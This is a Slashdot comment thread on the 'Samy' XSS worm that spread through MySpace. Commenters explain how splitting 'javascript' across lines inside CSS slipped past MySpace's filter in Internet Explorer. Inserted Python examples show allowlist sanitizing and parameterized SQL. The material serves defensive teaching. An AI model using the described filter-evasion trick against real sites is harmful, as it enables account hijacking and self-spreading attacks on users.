Slashdot Mirror


Cross-Site Scripting Worm Floods MySpace

DJ_Vegas writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, 'Samy' had amassed over 1 million friends on the popular online community. According to BetaNews, the worm's code utilized XMLHTTPRequest - a JavaScript object used in AJAX Web applications - and was spreading at a rate of 1,000 users every few seconds before MySpace shut down its site. Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet."

321 comments

  1. XSS? by mindstrm · · Score: 5, Informative

    Is it really XSS if it's all happening at the same site? Just sayin.....

    XMLHTTP has a same-site policy... the problem here is they let users render html & javascript in their own pages on the site. If slashdot allowed executable javascript in the comments, we'd have the same problem.

    1. Re:XSS? by Skye16 · · Score: 5, Informative

      No, they don't let you render JavaScript on the site. If you RTFA, he split the word "java script" into two lines, hid it in a CSS tag, and IE read it anyway. MySpace has stripped out tags for at least a year and a half.

    2. Re:XSS? by NicenessHimself · · Score: 1

      The attack did include uri rewriting from profiles.myspace.com to www.myspace.com precisely to cross the sites with script. Does that count as XSS? I wonder how many /.ers are about to start seeing what kind of html they can get through the /. forum checker..

    3. Re:XSS? by SerpentMage · · Score: 1

      I think the problem is that the MySpace site allows javascript to be uploaded.

      http://blog.outer-court.com/archive/2005-10-13-n73.html

      From the perspective of XMLHttpRequest you cannot call a domain that is not the original HTML page. IE, Mozilla, and Safari implement the same-domain policy and, having experimented, it is not possible.

      --

      "You can't make a race horse of a pig"
      "No," said Samuel, "but you can make very fast pig"
    4. Re:XSS? by Skye16 · · Score: 2, Informative

      Goddammit, this is what I get for not previewing.

      "he split the word 'JavaScript' into two lines", and "MySpace has stripped out JavaScript and <script> tags for at least a year and a half"

    5. Re:XSS? by sadcox · · Score: 1, Insightful

      the problem here is they let users render html & javascript in their own pages on the site

      No, the problem is that they let users render html & javascript badly in their own pages on the site

      --
      "He hated Mexicans, and he was half Mexican. AND he hated irony!"
    6. Re:XSS? by ArsenneLupin · · Score: 5, Funny
      If slashdot allowed executable javascript in the comments, we'd have the same problem.

      Given its userbase, if Slashdot allowed this, it would have far far far worse problems. Like "if you ever read the wrong Slashdot comment with Internet Explorer, you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter..."

    7. Re:XSS? by Anonymous Coward · · Score: 0

      And the winner for Most Confused use of Jargon goes to... you!

      They don't let you "render" Javascript on the site because humans don't render anything. It's web browsers that do the rendering. There's no such thing as a CSS tag either.

    8. Re:XSS? by Anonymous Coward · · Score: 0

      wait a second... that's already happened! All the websites I visit have the goatse guy.

    9. Re:XSS? by ColaMan · · Score: 5, Funny

      you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter... ...... greatly improving their content.

      --

      You are in a twisty maze of processor lines, all alike.
      There is a lot of hype here.
    10. Re:XSS? by Haydn+Fenton · · Score: 4, Informative

      No, you can't upload Javascript to MySpace. That's the whole point.
      From what I gather, you can upload CSS tags and other non-harmful tags. However, 'Samy' managed to find out that instead of writing valid CSS code inside the CSS tag, you can simply write a Script tag (so long as you split it over two lines) and upload it that way.
      This in itself shouldn't be a problem; since the code is inside a CSS tag it should be parsed as invalid CSS code, and so there's no reason for MySpace to have blocked it.
      This is where IE comes into it: if you are using IE, it will parse it as a valid JavaScript tag anyway and execute the code.

      This isn't really a bug in MySpace (well, technically it is now), it's more like a bug in IE which can be exploited on MySpace, or any other site which allows similar tags in which code can be 'hidden'.

    11. Re:XSS? by arkanes · · Score: 2, Informative

      I suspect that IE's "dynamic CSS" JavaScript expressions, which can contain arbitrary JavaScript, are also an XSS vulnerability just waiting to happen. The ability to do this may have something to do with why script tags are parsed in stylesheets at all.

    12. Re:XSS? by Markus_UW · · Score: 1

      Haha, that's true in my opinion, Goatse is far less horrible than most ASP and Cold Fusion websites.

    13. Re:XSS? by Senzei · · Score: 1
      you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter... ...... greatly improving their content.

      More like giving people a visual description of what they have stumbled upon.

      --
      Slashdot: Where anecdotes and generalizations can be freely substituted for facts, logic, or intelligence
    14. Re:XSS? by dotgain · · Score: 1
      This isn't really a bug in MySpace (well, technically it is now), it's more like a bug in IE which can be exploited on MySpace, or any other site which allows similar tags in which code can be 'hidden'.

      I wish people like you wrote/edited the article summaries around here. Cheers

    15. Re:XSS? by m50d · · Score: 1

      Way to take the humour out of the joke by explaining it there dude.

      --
      I am trolling
  2. AJAX vuns by bloodredsun · · Score: 3, Insightful

    Is this the first AJAX vulnerability? Something like this would be expected in any new-ish tech that is increasing in popularity.

    1. Re:AJAX vuns by Anonymous Coward · · Score: 0

      Not the first AJAX exploit. The Greasemonkey one a while back is similar, as is another white paper on the site listed below. This site details the anatomy of an XSS worm:
      http://www.securiteam.com/securityreviews/6H00D0KEAY.html

    2. Re:AJAX vuns by Narcissus · · Score: 1

      This isn't an AJAX vulnerability: it's XSS that uses AJAX to do its thing. The vulnerability itself is entirely a server side issue. Well, as far as I understand it, anyway...

    3. Re:AJAX vuns by WhoDey · · Score: 1

      Someone didn't quite get the point. This has nothing to do with any vulnerability in AJAX. Cross-site scripting is a result of a web app doing a poor job of redisplaying input that it was given. This was combined with a javascript object to do some malicious stuff. While that javascript object is used in AJAX applications, this is certainly not an AJAX vulnerability.

    4. Re:AJAX vuns by erlenic · · Score: 2, Informative

      As others have pointed out elsewhere, it was an IE issue. MySpace apparently does filter out the word "javascript", but this guy was able to use a problem in IE to split the word across two lines, and put it inside some CSS code. For some reason, IE sees fit to execute code like that.

    5. Re:AJAX vuns by Limecron · · Score: 1

      AJAX is an abstract concept that describes the use of a pair of technologies, namely JavaScript and XML. It is not a "thing" that can have a vulnerability. JavaScript and XML are ALSO not capable of having vulnerabilities either, since they're just languages. The only things that have vulnerabilities in the computer-related sense are specific pieces of software.

      In this case it's a problem with IE for improperly running JavaScript where it shouldn't. Or you could argue it's MySpace's fault for not knowing that IE would run it.

    6. Re:AJAX vuns by Richard_at_work · · Score: 2, Insightful

      And the website blindly accepted the resultant request back with no issues. This was a website problem regardless of what happened elsewhere.

    7. Re:AJAX vuns by Intron · · Score: 1

      The website got a legal form making this person the user's friend. It's not a website problem. The problem is that javascript can be injected which gets executed and does form entries without the user's knowledge. That's a browser problem.

      Firefox is not necessarily immune to XSS attacks, see noscript.

      --
      Intron: the portion of DNA which expresses nothing useful.
    8. Re:AJAX vuns by dmh20002 · · Score: 2, Informative

      XmlHttpRequest breaks the ingrained UI idiom of 'nothing happens until I click something'. Ajax (specifically XmlHttpRequest) has some scary implications for phishing. From a post on JoelOnSoftware discussion list by 'JD':
      For example, when someone clicks a link in an email that is out phishing for an SSN and personal info, you could be half-way through the form, and think - wait, I don't want to do this. BUT, with XmlHttpRequest, your information that you've only typed into the form has already been nabbed and sent to someone overseas - and you didn't see ANYTHING happen.

    9. Re:AJAX vuns by erlenic · · Score: 1

      You do have a point there, but I wouldn't expect a website designer to have to check for invalid code, especially mid-word line breaks with code embedded in the wrong place. Was this bug in IE well documented? I've never heard of it myself. Either way, it does show just how difficult it is to fully secure a website.

  3. Aww... by Anonymous Coward · · Score: 5, Funny

    Myspace was out for a bit? Now you've REALLY given those emo kids something to cry about.

    1. Re:Aww... by mikael · · Score: 5, Funny

      I bet he doesn't have over 1 million friends now.

      --
      Vintage computer adverts: http://www.vintageadbrowser.com/computers-and-software-ads
    2. Re:Aww... by maxwell+demon · · Score: 4, Insightful

      Well, having over 1 million foes is also an achievement ...

      --
      The Tao of math: The numbers you can count are not the real numbers.
    3. Re:Aww... by BrokenHalo · · Score: 1
      Well, having over 1 million foes is also an achievement ...

      Indeed, and well said. What would the average slashdotter do with 10^6 friends? Buy them all christmas presents? :-P

    4. Re:Aww... by Anonymous Coward · · Score: 0

      Actually he does, until 1000000 users get around to removing "samy is my hero" from their sites. Search for the phrase in quotes in google or msn. (Msn indexes myspace quicker/better, which may or may not show how irrelevant msn search is)

    5. Re:Aww... by Anonymous Coward · · Score: 0

      What is this "friend" thing you go on about?

  4. I find this amusing... by Coocha · · Score: 4, Interesting

    I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

    So this guy found a way to win the popularity contest. I scoff at him too, though at the same time I must laud him for his creativity. If other ./ers have insight as to what kind of malicious applications his XSS could be used for, I welcome the opportunity to learn. Also, what exactly IS XSS? Cross-site (to me) indicates that the script performs a function across multiple webpages... would this refer to all the peers in the Myspace cluster?

    --
    May the threads progress competently.
    1. Re:I find this amusing... by FluffyPanda · · Score: 1

      The only XSS reference I can find is that he was able to access profiles from www.myspace.com while the user thought they were on profiles.myspace.com

    2. Re:I find this amusing... by lav-chan · · Score: 3, Interesting

      I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

      Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

      That said, MySpace is probably one of the worst-written sites of all time. Tom seems like a swell guy (i've talked to him a few times), but he and/or his team couldn't design a site if their lives depended on it. I mean that in terms of both the HTML and the 'server-side' stuff. They're constantly doing maintenance (which hardly ever seems to fix anything); they do completely random text-filtering (like you can't say '% of', the system will strip it out); the time zones are always wrong; you have to post blogs twice sometimes in order to get the auto-formatting to work; their HTML/CSS is terrible (most of their ids and classes have illegal names); the blog's design editor is retarded because the default style sheet is set to override your custom style sheet (so i'm not sure what the point is of even having the option); and so on.

      Tom says he's working on a 'CSS-friendly' version of MySpace, and it seems like that's the case because suddenly there's a bunch of unused stuff if you look at the style sheet, but i have doubts that it's actually going to be much better. ... Or if it's even going to be 'CSS-friendly'.

      :shrug:

    3. Re:I find this amusing... by giorgiofr · · Score: 1

      I humbly suggest "Gratuito come birra e libero come formaggio" as the next release of your sig. It still makes no sense but it's funnier. :)

      --
      Global warming is a cube.
    4. Re:I find this amusing... by hazzey · · Score: 1

      The same thing has been done with FaceBook. The only difference is that FaceBook still requires each user to actually accept the friendship. That doesn't stop people from running a script that invites everyone to be their friend.

    5. Re:I find this amusing... by jallen02 · · Score: 2, Interesting

      It's amazing to me that the site was sold for $580 million. Obviously technical annoyances didn't stop him from making an insane amount of money off the whole deal.

      Oh and % is used in LIKE queries, that may be why it's filtered?

      Jeremy

    6. Re:I find this amusing... by ryanov · · Score: 1

      RTFA. This is the same thing MySpace did -- it generated requests from other users. He would still have to accept all of the requests, maybe with a script, but it didn't automatically make them friends.

    7. Re:I find this amusing... by Lehk228 · · Score: 1

      did you rtfa? the worm would cause each user viewing his page to invite him, and he had his system set up to accept all invites

      --
      Snowden and Manning are heroes.
    8. Re:I find this amusing... by MrRogers2 · · Score: 3, Informative
      According to this article, XSS is a bit of a misnomer:
      The term cross site scripting is not a very accurate description of this class of vulnerability. In the words of XSS pioneer Marc Slemko:
      This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name.
      Check out the full article for a good description of the types of XSS exploits.
      --
      MrRogers(2)
    9. Re:I find this amusing... by Hosiah · · Score: 1
      ./ers

      Nearly as amusing is this common typo for "/.ers". I hypothesize that Linux users are most prone, since typing "./" on the command line means "here" in the directory sense.

      OT as all get out, of course.

    10. Re:I find this amusing... by 00110011 · · Score: 1

      Why would it have to be filtered out when it could easily be escaped?

    11. Re:I find this amusing... by hazzey · · Score: 1

      Sigh. Did you read my post? It is pretty clear that I knew what the differences between the two were. All I was doing was adding info to the world at large. This sort of thing seems to be a drawback to all of these "# of friends" communities.

    12. Re:I find this amusing... by someonewhois · · Score: 1

      And quotes are used in all queries, but nobody strips those. :p

    13. Re:I find this amusing... by Anonymous Coward · · Score: 0

      Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

      Have you tried Multiply? Lots and lots of MySpace users were defecting there recently.

    14. Re:I find this amusing... by kurtmckee · · Score: 1

      MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles

      I won't argue the kudos for bringing it all together. Nonetheless, MySpace has done a breathtakingly poor job on every individual component. Blogs are better handled at Blogger and elsewhere, photos are best shared at Flickr and elsewhere...

      MySpace consolidates poorly implemented technologies into a single package, but I have little confidence that good integration is better than good implementation (of individual technologies).

    15. Re:I find this amusing... by Kent+Recal · · Score: 1

      580... fuckin.. million.... ? please imagine the sound of my jaw dropping onto the table. i mean... umm... c'mon... what the hell? how long does it take to recoup that kind of money only through advertising and membership fees? i actually googled it up because i thought you had a typo... but its really over half a friggin billion us dollars. half a billion!! then i looked at the site. and was stunned even more. i mean seriously. what kind of crap is this? this looks like geocities with a bunch of (technically) seriously bad implemented gimmicks slapped on top. i can understand the community is huge and low-tech people prolly might feel less intimidated by the crappy look than by a slick design. but.... hell... half a billion??? give me a tenth of that and i build you a site better than that, in under two years!@#%

    16. Re:I find this amusing... by darco · · Score: 1

      Word.

      It's a travesty, that's for sure. A 1/10th of that would have funded my (now defunct) company for years. Hell, even 1/1000th of that would have quadrupled our bootstrap operating capital.

      Crazy.

      --
      — darco
    17. Re:I find this amusing... by jallen02 · · Score: 1

      By Fox, nonetheless. And get this: Macromedia, the company that makes ColdFusion, the programming language used to power that site, only has a market cap of something like 2.96 bn.

      Heh Heh.

  5. Go Samy! by jeek · · Score: 4, Funny

    Go Samy! We're rooting for you over at EFnet #olsentwins!@

    --
    If you want to be seen, stand up. If you want to be heard, speak up. If you want to be respected, sit down and shut up.
    1. Re:Go Samy! by UnixRevolution · · Score: 1

      Sounds like a fun channel. But Who's Olsent, and why has he won?

      I just hope the channel is legal by now.

      --
      You like your new Mac more than you like me, don't you, Dave? Dave? I asked...She said Yes.
  6. Re:Day late, dollar short. by Anonymous Coward · · Score: 0

    ja slashdot is teh suck. only a place for l4m3 ch00bs to hang out. m0r0ns.

  7. More info... by TheSync · · Score: 5, Informative

    Here is a recent paper on XSS viruses. Also there is an analysis of the specific MySpace worm.

    Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

    1. Re:More info... by neoform · · Score: 1

      it's not really shocking that MySpace lets this sort of thing through, i've always been completely unimpressed with MySpace's design.. it's always been a wonder to me why people use it.. other than the obvious "everyone else is using it" syndrome..

      kinda reminds me of windows..

      --
      MABASPLOOM!
    2. Re:More info... by slavemowgli · · Score: 1, Informative

      Livejournal disallows Javascript (and even CSS) on their users' user info pages, but not in the actual journal entries.

      --
      quidquid latine dictum sit altum videtur.
    3. Re:More info... by F_Scentura · · Score: 1

      Are you serious? "Everyone else is using it" is *the* draw for a social networking site. Its interface is decent, and it handled the Friendster migration without the same level of outages.

    4. Re:More info... by Anonymous Coward · · Score: 0
      it's not really shocking that MySpace lets this sort of thing through

      Please RTFA.

    5. Re:More info... by nine-times · · Score: 1
      Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

      MySpace also scrubs javascript. This guy put obfuscated javascript into CSS for delivery.

    6. Re:More info... by Jerf · · Score: 5, Insightful
      And it gets through because stupid programmers persist in making two mistakes:
      1. Defining "badness" instead of "goodness"
      2. Trying to "clean up" invalid code
      The first one means that you try to list all of the ways that the input can be bad. The Universe is evil and it hates you. You can't list all the funky things that it can do to you. Instead, list the good things and carefully verify that the input is good.

      For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it." Write a rule that says "Passwords may contain only letters, numbers, and underscores." In the first case, especially in the brave new world of Unicode, you'll never enumerate all the bad things that can happen.

      The second mistake is that once you've decided that input is bad, do not try to clean it up. The process of cleaning it up may itself make it invalid in the case of something like HTML. Just reject it with a good error message and let the user take care of it.

      If that is absolutely impossible, preferably on the lines of "you'll be fired if you don't clean it up", then at the very least, you must continue to recursively run the cleanup code until the input converges (is unchanged by the cleanup code).

      It's not that it's absolutely impossible to get it right if you don't follow these rules, it's just that it's really freakin' hard. Slashdot, for instance, does seem to manage, but it took them a few iterations and ultimately, it's a low-priority site even if it does get hacked a little. Is your program that unimportant?

      It's way, way easier to define legit HTML (specific tags, no attributes usually though it's easy to let a few specific ones through, even with a handful of specific values) than it is to create a function to take any arbitrary string and make "safe" HTML out of it.
    7. Re:More info... by shawn(at)fsu · · Score: 1

      Wait a second, everyone is using it you say. BRB I have to go set up my profile.

      --
      500 dollar reward for tip(s) leading to the arrest of the person(s) who stole my sig.
    8. Re:More info... by amliebsch · · Score: 1
      Defining "badness" instead of "goodness"

      Is that really applicable here? We're talking about free-form content. What can you do, allow users only to use whitespace and alphanumeric characters? Completely disable using angle brackets? The "badness" you are trying to prevent is distinguishable from the "goodness" only by the patterns that it occurs in. So you say, don't clean it? The real problem here is even identifying that it needs to be cleaned at all. You can't even reject bad input outright if you can't identify that it has a problem.

      --
      If you don't know where you are going, you will wind up somewhere else.
    9. Re:More info... by ffrinch · · Score: 2, Informative

      That's not true. You can add JavaScript to entries, but it will never be displayed on the page. The HTML cleaner strips it out.

      Occasionally someone finds a new security hole, but they're patched pretty quickly.

    10. Re:More info... by Jerf · · Score: 3, Insightful

      We're talking about free-form content.

      No, we're not. We're talking about HTML, or things that end up as HTML. (For instance, Wiki formatting, UBB formatting, etc.) It's not English text that spread like a virus, it's code.

      If you can't figure out how to write something that identifies good HTML, then you absolutely, positively should not be writing code for the web. If you think HTML is "free-form content", you're part of the problem.

      The "badness" you are trying to prevent is distinguishable from the "goodness" only by the patterns that it occurs in.

      No shit. You are aware that there are decades of work in computer science on the topic? And that the relevant work is all nicely packaged up as libraries that don't even require you to really understand said decades of work?

      All you have to do is hook up an HTML parser, and reject the content the instant you see anything bad; tags not in the approved list, attributes not in the approved list, etc. For extra bonus points to defend against a bad parser you might consider re-outputting the HTML from the parse tree via your own code that can be guaranteed to only produce safe, code-free HTML by construction, but that's generally unnecessary because for someone who actually knows what they're doing an HTML parser is not that hard, and the crappy/buggy ones generally stay very safely un-famous. (An HTML parser that gracefully handles the shitty HTML on the web today is quite a different story, but that doesn't apply here; you shouldn't be using such a thing for verification.)

      If you truly find this hard, you need to either grow your skills until it isn't, stop programming for the web, or batten down the hatches and prepare for the day when something crappy like this happens to your site. The same extends to anytime user input may be interpreted as code that affects anyone else, too. I'm not the one presenting you with these choices; I'm just explaining the situation. It's just that this is how it works, in the real world. "But it's hard!" doesn't change anything.
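
Jerf's two posts above (define "goodness" rather than "badness"; reject instead of cleaning up; hook up a real HTML parser and re-emit from the parse events so the output is safe by construction) in runnable form. This is an added example, not code from the thread, MySpace or Slashdot; the allowed-tag policy and the sample inputs are constructed for the illustration.

```python
import html
from html.parser import HTMLParser

# Allowlist policy (constructed for this example): tag -> attributes permitted on it.
# Anything not listed here is grounds for rejecting the whole input.
ALLOWED = {"b": set(), "i": set(), "p": set(), "br": set(), "a": {"href"}}
VOID_TAGS = {"br"}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")


class RejectingSanitizer(HTMLParser):
    """Rebuilds HTML from the parser's events; the first disallowed construct
    records a rejection reason and the caller refuses the input outright."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # re-emitted HTML, built only from allowed pieces
        self.stack = []      # open tags, to insist on well-formed nesting
        self.rejected = None  # first reason for rejection, or None

    def reject(self, why):
        if self.rejected is None:
            self.rejected = why

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return self.reject(f"tag <{tag}> not allowed")
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                return self.reject(f"attribute {name!r} not allowed on <{tag}>")
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                return self.reject(f"href value {value!r} not allowed")
            # Attribute values are re-emitted escaped, never copied verbatim.
            rendered.append(f' {name}="{html.escape(value, quote=True)}"')
        if tag not in VOID_TAGS:
            self.stack.append(tag)
        self.out.append(f"<{tag}{''.join(rendered)}>")

    def handle_endtag(self, tag):
        if tag not in ALLOWED:
            return self.reject(f"end tag </{tag}> not allowed")
        if tag in VOID_TAGS:
            return  # <br> has no closing tag to emit
        if not self.stack or self.stack.pop() != tag:
            return self.reject(f"misnested end tag </{tag}>")
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is always escaped on the way out, so literal angle brackets survive as text.
        self.out.append(html.escape(data, quote=False))

    # Comments, declarations, processing instructions and CDATA are never part of
    # the "good" set, so each one rejects the input.
    def handle_comment(self, data):
        self.reject("comment not allowed")

    def handle_decl(self, decl):
        self.reject("declaration not allowed")

    def handle_pi(self, data):
        self.reject("processing instruction not allowed")

    def unknown_decl(self, data):
        self.reject("unknown declaration not allowed")


def sanitize(fragment):
    """Return (True, rebuilt_html) or (False, reason). Bad input is refused, not repaired."""
    p = RejectingSanitizer()
    p.feed(fragment)
    p.close()
    if p.stack:
        p.reject(f"unclosed <{p.stack[-1]}>")
    if p.rejected:
        return False, p.rejected
    return True, "".join(p.out)


def denylist_passes(fragment):
    """The contrasting 'badness' approach the thread attributes to MySpace: look for
    the word 'javascript'. It cannot know what a lenient browser will reassemble
    from 'java' + newline + 'script', so it lets through what the parser refuses."""
    return "javascript" not in fragment.lower()
```

Because the tokenizer sees `<java\nscript>` as a start tag named `java` with an attribute `script`, the allowlist rejects it without anyone having anticipated that particular trick; the denylist, which only knows the contiguous word, passes it.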

    11. Re:More info... by MobyDisk · · Score: 2, Informative
      Your concepts are right, but I see two flaws in your execution:
      1) Write a rule that says "Passwords may contain only letters, numbers, and underscores."
      Rules like this are arbitrary and cause other problems. My passwords use more than just letters, numbers, and underscores. There are lots of other characters that are perfectly valid. If you are going to define what is good, define it universally, not arbitrarily. How about all non-control ASCII characters: 32-126? It is safe but also non-restrictive.

      2)For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it."
      There is nothing wrong with / = and \. If your code somewhere on the back-end treats those as escape characters then you have a security bug that needs to be fixed at that level. Limiting the user is not the solution because what if those characters make it in to your library through some other route?

      If you are referring to the Unicode escape strings like \u000A then you are not following another rule, which I'll add to your list as rule #3:

      1. Defining "badness" instead of "goodness"
      2. Trying to "clean up" invalid code
      3. Not using the appropriate parser

      If someone enters \u000A, then your code should either treat that as the 6-character sequence that it is, at which point there is no problem, or it should treat it as a newline character, which will be rejected. Either way you are fine. It is only a problem if you treat it one way in one part of the code, and another way in another part of the code. That's why you use the proper parser. If the user entered ASCII and you wanted UNICODE then the UNICODE parser will see that as a newline and you will reject it. If they entered ASCII and you wanted ASCII then that sequence does nothing and you are fine. If your filtering routine treats it as ASCII but you later make it UNICODE and pass it to a SQL server, then the user may have snuck something in. Really, if you use the appropriate parser then characters never need to be filtered. Suppose a malicious user tries a SQL injection by entering in a \ or an unmatched quote or a newline character, then I don't need to be afraid so long as I used the SQL engine's prepare() command to parse the string. It knows how to escape the strings properly. So there is no need to filter anything.
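
MobyDisk's points in runnable form: a character rule for passwords stated as what is allowed (printable ASCII 32-126), and a lookup that hands the string to the SQL engine as a bound parameter so quotes, backslashes, newlines and the 6-character `\u000A` sequence stay ordinary characters. Added example, not from the thread; the table and rows are constructed, and sqlite3's `?` placeholders stand in for the `prepare()` call the post mentions.

```python
import sqlite3


def password_charset_ok(password):
    """Define the good set once: every character must be printable ASCII (32..126).
    Nothing is stripped or escaped; input outside the set is simply refused."""
    return len(password) > 0 and all(32 <= ord(c) <= 126 for c in password)


def make_db():
    """In-memory table with constructed rows whose notes contain a quote, a
    backslash, a newline and the literal six characters \\u000A."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, note TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a'b\\c\nd"), ("bob", "\\u000A")],
    )
    conn.commit()
    return conn


def lookup_note(conn, name):
    """Parameterized lookup: the engine binds `name` as a value, so no character
    in it can become SQL syntax and nothing needs filtering beforehand."""
    row = conn.execute("SELECT note FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def lookup_note_unsafe(conn, name):
    """The mistake the post warns about: splicing the string into the statement,
    so the application's reading of the characters and the engine's can diverge."""
    row = conn.execute(f"SELECT note FROM users WHERE name = '{name}'").fetchone()
    return row[0] if row else None


def unsafe_lookup_fails(conn, name):
    """True when the spliced statement no longer parses the way the author meant;
    an unmatched quote in `name` is enough to break it."""
    try:
        lookup_note_unsafe(conn, name)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(repr(lookup_note(db, "bob")), len(lookup_note(db, "bob")))
    print(lookup_note(db, "o'brien"), unsafe_lookup_fails(db, "o'brien"))
```

The bound-parameter lookup with `o'brien` simply finds no row, while the spliced version raises a syntax error on the same input; the stored `\u000A` comes back as six characters, exactly as it went in.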

    12. Re:More info... by NMerriam · · Score: 1

      It's not English text that spread like a virus, it's code.

      But isn't the very exploit we're discussing a case of plain english text being interpreted by some browsers as HTML markup?

      --
      Recursive: Adj. See Recursive.
    13. Re:More info... by MichaelSmith · · Score: 1

      The bug tracking system used by my employer's IS department sends html encoded emails with text/plain mime headers. Presumably OE users see formatted html because the text starts with an html tag but sylpheed faithfully displays the source code.

      I raised a bug for this and of course got a whole lot of html code sent back at me saying that they would get right on it. Just like six months ago.

    14. Re:More info... by Kent+Recal · · Score: 1

      But isn't the very exploit we're discussing a case of plain english text being interpreted by some browsers as HTML markup?

      Anyone dealing with HTML knows that browsers tend to deal "gracefully" with malformed code.

      Therefore, unless this is your first year of "real world programming", you have probably learned that *all* user input that is supposed to be fed back to other clients as HTML must either have all angle brackets replaced by &lt; and &gt; *or* the stuff must be piped through a (really, really simple) HTML parser.

      This little newline stunt is a no-brainer: neither <java script> nor <java\nscript> is an allowed tag - so drop it.

      I find it rather amusing that a website that claims to be worth $580 million fails over such a basic (fundamental, elementary, ridiculously obvious) concept...

    15. Re:More info... by NMerriam · · Score: 1

      Thanks for the clarification!

      --
      Recursive: Adj. See Recursive.
  8. Back in my day by Dachannien · · Score: 4, Funny

    And to think that, back in the day, people made friends by actually talking to other people.

    1. Re:Back in my day by n7022c · · Score: 1

      That is SOOO low-tech, dude.

    2. Re:Back in my day by FlopEJoe · · Score: 5, Funny

      Almost sad... hacking for online "friends." Like how my mother had to tie some liver to my collar to get the family dog to play with me :(

    3. Re:Back in my day by Anonymous Coward · · Score: 0

      That's the same argument people used to make against email and IM.

    4. Re:Back in my day by Anonymous Coward · · Score: 0

      At least with e-mail and IM, you're actually communicating with someone.

    5. Re:Back in my day by Anonymous Coward · · Score: 0

      Are you sure that was your mother? It sounds like she wanted the dog to rip out your throat.

    6. Re:Back in my day by Captain+DaFt · · Score: 1

      How'd that work out for you?
      When my mom tried it with me, the dog turned vegan. }:P

      --
      The U.S. really needs an English to Wisdom dictionary.
    7. Re:Back in my day by berbo · · Score: 1

      You had words? Luxury! Back in my day, all we had were grunts - and we liked it!

  9. Well, people have been saying it's a security risk by g_dunn · · Score: 0

    And people still leave it enabled in absurd situations like this. Hopefully MySpace and the other journal-esque sites who still have javascript enabled get a clue. While their poor security only affected themselves this time, someone with more malicious intent could easily take advantage of this for a lot more destructive actions than merely viral friendmaking.

  10. Awsome by AForwardMotion · · Score: 5, Funny

    He'll probably get a lot of job offers from this.

    1. Re:Awsome by bornbitter · · Score: 1

      yeah, like stamping license plates... if he further 'improves' his resume. Then his 'friends' will show up in a nice shiny black Suburban and show him how real 'friendship bracelets' won't come off without the 'friend's' key. He might even get a new room-mate!

      --
      "Our Constitution was made only for a moral and religious people. It is wholly inadequate to govern any other" -John Ada
    2. Re:Awsome by PickyH3D · · Score: 1

      You think he can handle life outside his parent's basement?

  11. Terrorism! by Anonymous Coward · · Score: 0

    Subverting MySpace to create 1,000 friends per second? Obviously a terrorist. Send him to Gitmo!

  12. Re:Day late, dollar short. by Iriel · · Score: 4, Insightful

    These '/. is slow and stupid' kind of posts just need to stop. But I listen to 4 different tech podcasts and hadn't heard about this yet. Think about the people who check /. for news while they're at work and most likely away from iTunes and their bookmarks, and (god-forbid) without a readily accessible aggregator. Realize this site for what it is: for the majority of it, other techies posting news they've heard about to a community they might think will care to hear it. This isn't "news as it happens updated every second" so stop treating it like it is.

    --
    Perfecting Discordia
    www.stevenvansickle.com
  13. The Microsoft curse? by alucinor · · Score: 0

    So ... MS invents XMLHttpRequest ... what's logically to follow with *any* new technology MS invents? Here's for hoping that their "magic touch" will end here.

    --
    random underscore blankspace at ya know hoo dot comedy.
  14. IE is too forgiving by benhocking · · Score: 4, Insightful

    In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things. The result of IE doing this was that some web pages look good in IE that didn't look good in other browsers - thus encouraging more people to use IE. As HTML was being used more and more by the masses, there seemed some logic to this. Of course, one of the problems with this idea is that the designers were looking at their web-pages in IE to see if their code was written correctly.

    This story just goes to emphasize the importance of calling buggy HTML code what it is, and not trying to infer the intent of the HTML coder. Samy cleverly found a way to make "buggy code" that would get past MySpace's filter, but that would be rendered the way he intended by the browser with the majority market share.

    --
    Ben Hocking
    Need a professional organizer?
    1. Re:IE is too forgiving by saforrest · · Score: 1

      omitting terminating tags (e.g., &ltl\li>)

